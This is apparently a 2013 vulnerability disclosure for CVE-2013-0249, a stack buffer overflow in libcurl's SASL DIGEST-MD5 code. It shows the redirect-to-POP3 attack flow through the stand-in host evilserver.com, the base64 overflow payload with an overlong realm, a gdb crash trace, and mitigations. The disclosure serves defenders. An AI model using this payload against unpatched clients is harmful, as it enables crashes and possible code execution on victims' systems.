→ cURL buffer overflow
Wed 06 February 2013Volema found remotely exploitable buffer overflow vulnerability in libcurl POP3, SMTP protocol handlers which lead to code execution (RCE). When negotiating SASL DIGEST-MD5 authentication, the function Curl_sasl_create_digest_md5_message() uses the data provided from the server without doing the proper length checks and that data is then appended to a local fixed-size buffer on the stack.
Vendor notified, CVE-2013-0249 released.
Attack Concept Outline
We have the permissions to send custom HTTP requests with curl. We send request to our http://evilserver.com/
GET / HTTP/1.0 Host: evilserver.com
server answers with
HTTP/1.0 302 Found Location: pop3://x:x@evilserver.com/.
"smart" curl interpretes redirect and connects to evilserver.com port 110/TCP using POP3 proto. Server answers
+OK POP3 server ready
curl sends
CAPA
servers answers with DIGEST-MD5 only
+OK List of capabilities follows SASL DIGEST-MD5 IMPLEMENTATION dumbydumb POP3 server
so, libcurl has to send
AUTH DIGEST-MD5
then server sends the payload
+ cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBIixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg=
and overflow happens because of fixed "uri" buffer size (128) and "realm" which is also 128 bytes
realm="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8
how it looks in gdb
Program received signal SIGSEGV, Segmentation fault. 0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6 (gdb) bt #0 0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6 #1 0x00007fd2b2a5cc07 in Curl_sasl_create_digest_md5_message () from /home/ky/test/curl-7.28.1/lib/.libs/libcurl.so.4 #2 0x4141414141414141 in ?? () ... #1469 0x4141414141414141 in ?? () #1470 0x656d616e72657375 in ?? () Cannot access memory at address 0x7fff63b8b000
Original exploit: pop3d.py.
Mitigation
We recommend to disable protocols other than HTTP(S) in your application using options CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS. libcurl version should be updated.
Comments !